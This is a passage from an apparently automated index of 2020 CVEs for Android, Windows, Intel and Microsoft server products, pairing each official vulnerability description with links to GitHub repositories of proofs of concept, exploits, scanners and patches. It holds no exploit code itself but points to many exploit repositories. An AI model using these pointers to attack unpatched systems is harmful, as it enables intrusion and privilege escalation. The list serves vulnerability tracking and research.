In create of FileMap.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1 Android-9Android ID: A-156997193
- [nanopathi/system_core_AOSP10_r33_CVE-2020-0409](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0409)
### CVE-2020-0413 (2020-10-14)
In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158778659
- [Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413)
### CVE-2020-0416 (2020-10-14)
In multiple settings screens, there are possible tapjacking attacks due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-155288585
- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2020-0416)
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0416)
### CVE-2020-0418 (2020-11-10)
In getPermissionInfosForGroup of Utils.java, there is a logic error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-153879813
- [Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418](https://github.com/Trinadh465/packages_apps_PackageInstaller_AOSP10_r33_CVE-2020-0418)
- [fernandodruszcz/CVE-2020-0418](https://github.com/fernandodruszcz/CVE-2020-0418)
### CVE-2020-0421 (2020-10-14)
In appendFormatV of String8.cpp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-161894517
- [nanopathi/system_core_AOSP10_r33_CVE-2020-0421](https://github.com/nanopathi/system_core_AOSP10_r33_CVE-2020-0421)
### CVE-2020-0423 (2020-10-14)
In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161151868References: N/A
- [sparrow-labz/CVE-2020-0423](https://github.com/sparrow-labz/CVE-2020-0423)
### CVE-2020-0439 (2020-11-10)
In generatePackageInfo of PackageManagerService.java, there is a possible permissions bypass due to an incorrect permission check. This could lead to local escalation of privilege that allows instant apps access to permissions not allowed for instant apps, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-140256621
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439)
### CVE-2020-0443 (2020-11-10)
In LocaleList of LocaleList.java, there is a possible forced reboot due to an uncaught exception. This could lead to local denial of service requiring factory reset to restore with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-152410253
- [Supersonic/CVE-2020-0443](https://github.com/Supersonic/CVE-2020-0443)
### CVE-2020-0451 (2020-11-10)
In sbrDecoder_AssignQmfChannels2SbrChannels of sbrdecoder.cpp, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9 Android-8.0 Android-8.1Android ID: A-158762825
- [nanopathi/external_aac_AOSP10_r33_CVE-2020-0451](https://github.com/nanopathi/external_aac_AOSP10_r33_CVE-2020-0451)
### CVE-2020-0452 (2020-11-10)
In exif_entry_get_value of exif-entry.c, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution if a third party app used this library to process remote image data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-159625731
- [ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452](https://github.com/ShaikUsaf/external_libexif_AOSP10_CVE-2020-0452)
### CVE-2020-0453 (2020-11-10)
In updateNotification of BeamTransferManager.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-8.0 Android-8.1Android ID: A-159060474
- [pazhanivel07/Nfc_CVE-2020-0453](https://github.com/pazhanivel07/Nfc_CVE-2020-0453)
- [nanopathi/Packages_apps_Nfc_CVE-2020-0453](https://github.com/nanopathi/Packages_apps_Nfc_CVE-2020-0453)
- [Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453](https://github.com/Trinadh465/packages_apps_Nfc_AOSP10_r33_CVE-2020-0453)
### CVE-2020-0458 (2020-12-14)
In SPDIFEncoder::writeBurstBufferBytes and related methods of SPDIFEncoder.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-8.0 Android-8.1Android ID: A-160265164
- [nanopathi/system_media_AOSP10_r33_CVE-2020-0458](https://github.com/nanopathi/system_media_AOSP10_r33_CVE-2020-0458)
### CVE-2020-0463 (2020-12-14)
In sdp_server_handle_client_req of sdp_server.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure from the bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.0 Android-8.1 Android-9Android ID: A-169342531
- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0463](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0463)
### CVE-2020-0471 (2021-01-11)
In reassemble_and_dispatch of packet_fragmenter.cc, there is a possible way to inject packets into an encrypted Bluetooth connection due to improper input validation. This could lead to remote escalation of privilege between two Bluetooth devices by a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-169327567.
- [nanopathi/system_bt_AOSP10_r33_CVE-2020-0471](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2020-0471)
### CVE-2020-0551 (2020-03-12)
Load value injection in some Intel(R) Processors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. The list of affected products is provided in intel-sa-00334: https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00334.html
- [bitdefender/lvi-lfb-attack-poc](https://github.com/bitdefender/lvi-lfb-attack-poc)
### CVE-2020-0557 (2020-04-15)
Insecure inherited permissions in Intel(R) PROSet/Wireless WiFi products before version 21.70 on Windows 10 may allow an authenticated user to potentially enable escalation of privilege via local access.
- [hessandrew/CVE-2020-0557_INTEL-SA-00338](https://github.com/hessandrew/CVE-2020-0557_INTEL-SA-00338)
### CVE-2020-0568 (2020-04-15)
Race condition in the Intel(R) Driver and Support Assistant before version 20.1.5 may allow an authenticated user to potentially enable denial of service via local access.
- [hessandrew/CVE-2020-0568_INTEL-SA-00344](https://github.com/hessandrew/CVE-2020-0568_INTEL-SA-00344)
### CVE-2020-0601 (2020-01-14)
A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates.An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source, aka 'Windows CryptoAPI Spoofing Vulnerability'.
- [nissan-sudo/CVE-2020-0601](https://github.com/nissan-sudo/CVE-2020-0601)
- [0xxon/cve-2020-0601](https://github.com/0xxon/cve-2020-0601)
- [SherlockSec/CVE-2020-0601](https://github.com/SherlockSec/CVE-2020-0601)
- [JPurrier/CVE-2020-0601](https://github.com/JPurrier/CVE-2020-0601)
- [0xxon/cve-2020-0601-plugin](https://github.com/0xxon/cve-2020-0601-plugin)
- [ly4k/CurveBall](https://github.com/ly4k/CurveBall)
- [kudelskisecurity/chainoffools](https://github.com/kudelskisecurity/chainoffools)
- [RrUZi/Awesome-CVE-2020-0601](https://github.com/RrUZi/Awesome-CVE-2020-0601)
- [BlueTeamSteve/CVE-2020-0601](https://github.com/BlueTeamSteve/CVE-2020-0601)
- [saleemrashid/badecparams](https://github.com/saleemrashid/badecparams)
- [0xxon/cve-2020-0601-utils](https://github.com/0xxon/cve-2020-0601-utils)
- [Doug-Moody/Windows10_Cumulative_Updates_PowerShell](https://github.com/Doug-Moody/Windows10_Cumulative_Updates_PowerShell)
- [MarkusZehnle/CVE-2020-0601](https://github.com/MarkusZehnle/CVE-2020-0601)
- [YoannDqr/CVE-2020-0601](https://github.com/YoannDqr/CVE-2020-0601)
- [thimelp/cve-2020-0601-Perl](https://github.com/thimelp/cve-2020-0601-Perl)
- [dlee35/curveball_lua](https://github.com/dlee35/curveball_lua)
- [IIICTECH/-CVE-2020-0601-ECC---EXPLOIT](https://github.com/IIICTECH/-CVE-2020-0601-ECC---EXPLOIT)
- [Ash112121/CVE-2020-0601](https://github.com/Ash112121/CVE-2020-0601)
- [gentilkiwi/curveball](https://github.com/gentilkiwi/curveball)
- [Hans-MartinHannibalLauridsen/CurveBall](https://github.com/Hans-MartinHannibalLauridsen/CurveBall)
- [apodlosky/PoC_CurveBall](https://github.com/apodlosky/PoC_CurveBall)
- [ioncodes/Curveball](https://github.com/ioncodes/Curveball)
- [amlweems/gringotts](https://github.com/amlweems/gringotts)
- [yanghaoi/CVE-2020-0601](https://github.com/yanghaoi/CVE-2020-0601)
- [talbeerysec/CurveBallDetection](https://github.com/talbeerysec/CurveBallDetection)
- [david4599/CurveballCertTool](https://github.com/david4599/CurveballCertTool)
- [eastmountyxz/CVE-2020-0601-EXP](https://github.com/eastmountyxz/CVE-2020-0601-EXP)
- [eastmountyxz/CVE-2018-20250-WinRAR](https://github.com/eastmountyxz/CVE-2018-20250-WinRAR)
- [gremwell/cve-2020-0601_poc](https://github.com/gremwell/cve-2020-0601_poc)
- [bsides-rijeka/meetup-2-curveball](https://github.com/bsides-rijeka/meetup-2-curveball)
- [exploitblizzard/CVE-2020-0601-spoofkey](https://github.com/exploitblizzard/CVE-2020-0601-spoofkey)
- [ShayNehmad/twoplustwo](https://github.com/ShayNehmad/twoplustwo)
- [okanulkr/CurveBall-CVE-2020-0601-PoC](https://github.com/okanulkr/CurveBall-CVE-2020-0601-PoC)
- [cimashiro/-Awesome-CVE-2020-0601-](https://github.com/cimashiro/-Awesome-CVE-2020-0601-)
- [tyj956413282/curveball-plus](https://github.com/tyj956413282/curveball-plus)
- [JoelBts/CVE-2020-0601_PoC](https://github.com/JoelBts/CVE-2020-0601_PoC)
### CVE-2020-0609 (2020-01-14)
A remote code execution vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0610.
- [ruppde/rdg_scanner_cve-2020-0609](https://github.com/ruppde/rdg_scanner_cve-2020-0609)
- [ly4k/BlueGate](https://github.com/ly4k/BlueGate)
- [MalwareTech/RDGScanner](https://github.com/MalwareTech/RDGScanner)
- [Archi73ct/CVE-2020-0609](https://github.com/Archi73ct/CVE-2020-0609)
- [ioncodes/BlueGate](https://github.com/ioncodes/BlueGate)
### CVE-2020-0618 (2020-02-11)
A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
- [euphrat1ca/CVE-2020-0618](https://github.com/euphrat1ca/CVE-2020-0618)
- [wortell/cve-2020-0618](https://github.com/wortell/cve-2020-0618)
- [itstarsec/CVE-2020-0618](https://github.com/itstarsec/CVE-2020-0618)
### CVE-2020-0624 (2020-01-14)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0642.
- [james0x40/CVE-2020-0624](https://github.com/james0x40/CVE-2020-0624)
### CVE-2020-0668 (2020-02-11)
An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0669, CVE-2020-0670, CVE-2020-0671, CVE-2020-0672.
- [RedCursorSecurityConsulting/CVE-2020-0668](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)
- [Nan3r/CVE-2020-0668](https://github.com/Nan3r/CVE-2020-0668)
- [modulexcite/SysTracingPoc](https://github.com/modulexcite/SysTracingPoc)
- [ycdxsb/CVE-2020-0668](https://github.com/ycdxsb/CVE-2020-0668)
- [bypazs/CVE-2020-0668.exe](https://github.com/bypazs/CVE-2020-0668.exe)
- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit)
### CVE-2020-0674 (2020-02-11)
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0673, CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0767.
- [maxpl0it/CVE-2020-0674-Exploit](https://github.com/maxpl0it/CVE-2020-0674-Exploit)
- [Ken-Abruzzi/CVE-2020-0674](https://github.com/Ken-Abruzzi/CVE-2020-0674)
- [Neko-chanQwQ/CVE-2020-0674-PoC](https://github.com/Neko-chanQwQ/CVE-2020-0674-PoC)
- [Micky-Thongam/Internet-Explorer-UAF](https://github.com/Micky-Thongam/Internet-Explorer-UAF)
### CVE-2020-0683 (2020-02-11)
An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links, aka 'Windows Installer Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0686.
- [padovah4ck/CVE-2020-0683](https://github.com/padovah4ck/CVE-2020-0683)
### CVE-2020-0688 (2020-02-11)
A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory, aka 'Microsoft Exchange Memory Corruption Vulnerability'.
- [random-robbie/cve-2020-0688](https://github.com/random-robbie/cve-2020-0688)
- [Jumbo-WJB/CVE-2020-0688](https://github.com/Jumbo-WJB/CVE-2020-0688)
- [Ridter/cve-2020-0688](https://github.com/Ridter/cve-2020-0688)
- [Yt1g3r/CVE-2020-0688_EXP](https://github.com/Yt1g3r/CVE-2020-0688_EXP)
- [righter83/CVE-2020-0688](https://github.com/righter83/CVE-2020-0688)
- [truongtn/cve-2020-0688](https://github.com/truongtn/cve-2020-0688)
- [onSec-fr/CVE-2020-0688-Scanner](https://github.com/onSec-fr/CVE-2020-0688-Scanner)
- [youncyb/CVE-2020-0688](https://github.com/youncyb/CVE-2020-0688)
- [zcgonvh/CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688)
- [justin-p/PSForgot2kEyXCHANGE](https://github.com/justin-p/PSForgot2kEyXCHANGE)
- [cert-lv/CVE-2020-0688](https://github.com/cert-lv/CVE-2020-0688)
- [ravinacademy/CVE-2020-0688](https://github.com/ravinacademy/CVE-2020-0688)
- [mahyarx/Exploit_CVE-2020-0688](https://github.com/mahyarx/Exploit_CVE-2020-0688)
- [ktpdpro/CVE-2020-0688](https://github.com/ktpdpro/CVE-2020-0688)
- [w4fz5uck5/cve-2020-0688-webshell-upload-technique](https://github.com/w4fz5uck5/cve-2020-0688-webshell-upload-technique)
- [murataydemir/CVE-2020-0688](https://github.com/murataydemir/CVE-2020-0688)
- [zyn3rgy/ecp_slap](https://github.com/zyn3rgy/ecp_slap)
- [SLSteff/CVE-2020-0688-Scanner](https://github.com/SLSteff/CVE-2020-0688-Scanner)
- [MrTiz/CVE-2020-0688](https://github.com/MrTiz/CVE-2020-0688)
- [ann0906/proxylogon](https://github.com/ann0906/proxylogon)
- [7heKnight/CVE-2020-0688](https://github.com/7heKnight/CVE-2020-0688)
- [1337-llama/CVE-2020-0688-Python3](https://github.com/1337-llama/CVE-2020-0688-Python3)
- [chudamax/CVE-2020-0688-Exchange2010](https://github.com/chudamax/CVE-2020-0688-Exchange2010)
- [W01fh4cker/CVE-2020-0688-GUI](https://github.com/W01fh4cker/CVE-2020-0688-GUI)
### CVE-2020-0728 (2020-02-11)
An information vulnerability exists when Windows Modules Installer Service improperly discloses file information, aka 'Windows Modules Installer Service Information Disclosure Vulnerability'.
- [irsl/CVE-2020-0728](https://github.com/irsl/CVE-2020-0728)
### CVE-2020-0753 (2020-02-11)
An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0754.
- [afang5472/CVE-2020-0753-and-CVE-2020-0754](https://github.com/afang5472/CVE-2020-0753-and-CVE-2020-0754)
- [VikasVarshney/CVE-2020-0753-and-CVE-2020-0754](https://github.com/VikasVarshney/CVE-2020-0753-and-CVE-2020-0754)
### CVE-2020-0787 (2020-03-12)
An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'.
- [cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION)
- [MasterSploit/CVE-2020-0787](https://github.com/MasterSploit/CVE-2020-0787)
- [MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master](https://github.com/MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master)
- [yanghaoi/CVE-2020-0787](https://github.com/yanghaoi/CVE-2020-0787)
### CVE-2020-0796 (2020-03-12)
A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'.
- [k8gege/PyLadon](https://github.com/k8gege/PyLadon)
- [0x25bit/CVE-2020-0796-PoC](https://github.com/0x25bit/CVE-2020-0796-PoC)
- [technion/DisableSMBCompression](https://github.com/technion/DisableSMBCompression)
- [T13nn3s/CVE-2020-0796](https://github.com/T13nn3s/CVE-2020-0796)
- [ly4k/SMBGhost](https://github.com/ly4k/SMBGhost)
- [joaozietolie/CVE-2020-0796-Checker](https://github.com/joaozietolie/CVE-2020-0796-Checker)
- [ButrintKomoni/cve-2020-0796](https://github.com/ButrintKomoni/cve-2020-0796)
- [dickens88/cve-2020-0796-scanner](https://github.com/dickens88/cve-2020-0796-scanner)
- [kn6869610/CVE-2020-0796](https://github.com/kn6869610/CVE-2020-0796)
- [awareseven/eternalghosttest](https://github.com/awareseven/eternalghosttest)
- [xax007/CVE-2020-0796-Scanner](https://github.com/xax007/CVE-2020-0796-Scanner)
- [Dhoomralochana/Scanners-for-CVE-2020-0796-Testing](https://github.com/Dhoomralochana/Scanners-for-CVE-2020-0796-Testing)
- [UraSecTeam/smbee](https://github.com/UraSecTeam/smbee)
- [netscylla/SMBGhost](https://github.com/netscylla/SMBGhost)
- [eerykitty/CVE-2020-0796-PoC](https://github.com/eerykitty/CVE-2020-0796-PoC)
- [wneessen/SMBCompScan](https://github.com/wneessen/SMBCompScan)
- [ioncodes/SMBGhost](https://github.com/ioncodes/SMBGhost)
- [laolisafe/CVE-2020-0796](https://github.com/laolisafe/CVE-2020-0796)
- [gabimarti/SMBScanner](https://github.com/gabimarti/SMBScanner)
- [Almorabea/SMBGhost-WorkaroundApplier](https://github.com/Almorabea/SMBGhost-WorkaroundApplier)
- [vysecurity/CVE-2020-0796](https://github.com/vysecurity/CVE-2020-0796)
- [BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796](https://github.com/BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796)
- [w1ld3r/SMBGhost_Scanner](https://github.com/w1ld3r/SMBGhost_Scanner)
- [wsfengfan/CVE-2020-0796](https://github.com/wsfengfan/CVE-2020-0796)
- [GuoKerS/aioScan_CVE-2020-0796](https://github.com/GuoKerS/aioScan_CVE-2020-0796)
- [jiansiting/CVE-2020-0796-Scanner](https://github.com/jiansiting/CVE-2020-0796-Scanner)
- [maxpl0it/Unauthenticated-CVE-2020-0796-PoC](https://github.com/maxpl0it/Unauthenticated-CVE-2020-0796-PoC)
- [ran-sama/CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796)
- [sujitawake/smbghost](https://github.com/sujitawake/smbghost)
- [julixsalas/CVE-2020-0796](https://github.com/julixsalas/CVE-2020-0796)
- [cory-zajicek/CVE-2020-0796-DoS](https://github.com/cory-zajicek/CVE-2020-0796-DoS)
- [tripledd/cve-2020-0796-vuln](https://github.com/tripledd/cve-2020-0796-vuln)
- [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796)
- [jamf/CVE-2020-0796-LPE-POC](https://github.com/jamf/CVE-2020-0796-LPE-POC)
- [TinToSer/CVE-2020-0796-LPE](https://github.com/TinToSer/CVE-2020-0796-LPE)
- [f1tz/CVE-2020-0796-LPE-EXP](https://github.com/f1tz/CVE-2020-0796-LPE-EXP)
- [tango-j/CVE-2020-0796](https://github.com/tango-j/CVE-2020-0796)
- [jiansiting/CVE-2020-0796](https://github.com/jiansiting/CVE-2020-0796)
- [eastmountyxz/CVE-2020-0796-SMB](https://github.com/eastmountyxz/CVE-2020-0796-SMB)
- [LabDookhtegan/CVE-2020-0796-EXP](https://github.com/LabDookhtegan/CVE-2020-0796-EXP)
- [Rvn0xsy/CVE_2020_0796_CNA](https://github.com/Rvn0xsy/CVE_2020_0796_CNA)
- [0xeb-bp/cve-2020-0796](https://github.com/0xeb-bp/cve-2020-0796)
- [intelliroot-tech/cve-2020-0796-Scanner](https://github.com/intelliroot-tech/cve-2020-0796-Scanner)
- [jamf/CVE-2020-0796-RCE-POC](https://github.com/jamf/CVE-2020-0796-RCE-POC)
- [thelostworldFree/CVE-2020-0796](https://github.com/thelostworldFree/CVE-2020-0796)
- [section-c/CVE-2020-0796](https://github.com/section-c/CVE-2020-0796)
- [bacth0san96/SMBGhostScanner](https://github.com/bacth0san96/SMBGhostScanner)
- [halsten/CVE-2020-0796](https://github.com/halsten/CVE-2020-0796)
- [ysyyrps123/CVE-2020-0796](https://github.com/ysyyrps123/CVE-2020-0796)
- [ysyyrps123/CVE-2020-0796-exp](https://github.com/ysyyrps123/CVE-2020-0796-exp)
- [exp-sky/CVE-2020-0796](https://github.com/exp-sky/CVE-2020-0796)
- [Barriuso/SMBGhost_AutomateExploitation](https://github.com/Barriuso/SMBGhost_AutomateExploitation)
- [1060275195/SMBGhost](https://github.com/1060275195/SMBGhost)
- [Almorabea/SMBGhost-LPE-Metasploit-Module](https://github.com/Almorabea/SMBGhost-LPE-Metasploit-Module)
- [jamf/SMBGhost-SMBleed-scanner](https://github.com/jamf/SMBGhost-SMBleed-scanner)
- [rsmudge/CVE-2020-0796-BOF](https://github.com/rsmudge/CVE-2020-0796-BOF)
- [codewithpradhan/SMBGhost-CVE-2020-0796-](https://github.com/codewithpradhan/SMBGhost-CVE-2020-0796-)
- [AaronCaiii/CVE-2020-0796-POC](https://github.com/AaronCaiii/CVE-2020-0796-POC)
- [datntsec/CVE-2020-0796](https://github.com/datntsec/CVE-2020-0796)
- [MasterSploit/LPE---CVE-2020-0796](https://github.com/MasterSploit/LPE---CVE-2020-0796)
- [1stPeak/CVE-2020-0796-Scanner](https://github.com/1stPeak/CVE-2020-0796-Scanner)
- [Anonimo501/SMBGhost_CVE-2020-0796_checker](https://github.com/Anonimo501/SMBGhost_CVE-2020-0796_checker)
- [Opensitoo/cve-2020-0796](https://github.com/Opensitoo/cve-2020-0796)
- [orangmuda/CVE-2020-0796](https://github.com/orangmuda/CVE-2020-0796)
- [Murasame-nc/CVE-2020-0796-LPE-POC](https://github.com/Murasame-nc/CVE-2020-0796-LPE-POC)
- [F6JO/CVE-2020-0796-Batch-scanning](https://github.com/F6JO/CVE-2020-0796-Batch-scanning)
- [lisinan988/CVE-2020-0796-exp](https://github.com/lisinan988/CVE-2020-0796-exp)
- [vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-](https://github.com/vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-)
- [arzuozkan/CVE-2020-0796](https://github.com/arzuozkan/CVE-2020-0796)
- [SEHandler/CVE-2020-0796](https://github.com/SEHandler/CVE-2020-0796)
- [TweatherQ/CVE-2020-0796](https://github.com/TweatherQ/CVE-2020-0796)
- [krizzz07/CVE-2020-0796](https://github.com/krizzz07/CVE-2020-0796)
- [OldDream666/cve-2020-0796](https://github.com/OldDream666/cve-2020-0796)
- [Ajomix/CVE-2020-0796](https://github.com/Ajomix/CVE-2020-0796)
- [hungdnvp/POC-CVE-2020-0796](https://github.com/hungdnvp/POC-CVE-2020-0796)
- [AdamSonov/smbGhostCVE-2020-0796](https://github.com/AdamSonov/smbGhostCVE-2020-0796)
- [z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities](https://github.com/z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities)
### CVE-2020-0887 (2020-03-12)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0788, CVE-2020-0877.
- [vinhthp1712/CVE-2020-0887](https://github.com/vinhthp1712/CVE-2020-0887)
### CVE-2020-0890 (2020-09-11)
<p>A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.</p>\n<p>To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.</p>\n<p>The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests.</p>\n
- [gerhart01/hyperv_local_dos_poc](https://github.com/gerhart01/hyperv_local_dos_poc)
- [skasanagottu57gmailv/gerhart01](https://github.com/skasanagottu57gmailv/gerhart01)
- [MarcelloTinocor/gerhart01](https://github.com/MarcelloTinocor/gerhart01)
### CVE-2020-0910 (2020-04-15)
A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'.
- [kfmgang/CVE-2020-0910](https://github.com/kfmgang/CVE-2020-0910)
### CVE-2020-0976 (2020-04-15)
A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-0972, CVE-2020-0975, CVE-2020-0977.
- [ericzhong2010/GUI-Check-CVE-2020-0976](https://github.com/ericzhong2010/GUI-Check-CVE-2020-0976)
### CVE-2020-1015 (2020-04-15)
An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0934, CVE-2020-0983, CVE-2020-1009, CVE-2020-1011.
- [0xeb-bp/cve-2020-1015](https://github.com/0xeb-bp/cve-2020-1015)
### CVE-2020-1020 (2020-04-15)
A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.
- [CrackerCat/CVE-2020-1020-Exploit](https://github.com/CrackerCat/CVE-2020-1020-Exploit)
- [KaLendsi/CVE-2020-1020](https://github.com/KaLendsi/CVE-2020-1020)
### CVE-2020-1034 (2020-09-11)
<p>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.</p>\n<p>To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.</p>\n<p>The security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.</p>\n
- [yardenshafir/CVE-2020-1034](https://github.com/yardenshafir/CVE-2020-1034)
- [GeorgiiFirsov/CVE-2020-1034](https://github.com/GeorgiiFirsov/CVE-2020-1034)
### CVE-2020-1048 (2020-05-21)
An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1070.
- [zveriu/CVE-2009-0229-PoC](https://github.com/zveriu/CVE-2009-0229-PoC)
- [shubham0d/CVE-2020-1048](https://github.com/shubham0d/CVE-2020-1048)
- [Ken-Abruzzi/CVE-2020-1048](https://github.com/Ken-Abruzzi/CVE-2020-1048)
- [Y3A/cve-2020-1048](https://github.com/Y3A/cve-2020-1048)
### CVE-2020-1054 (2020-05-21)
An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143.
- [0xeb-bp/cve-2020-1054](https://github.com/0xeb-bp/cve-2020-1054)
- [Iamgublin/CVE-2020-1054](https://github.com/Iamgublin/CVE-2020-1054)
- [KaLendsi/CVE-2020-1054](https://github.com/KaLendsi/CVE-2020-1054)
- [Graham382/CVE-2020-1054](https://github.com/Graham382/CVE-2020-1054)
### CVE-2020-1066 (2020-05-21)
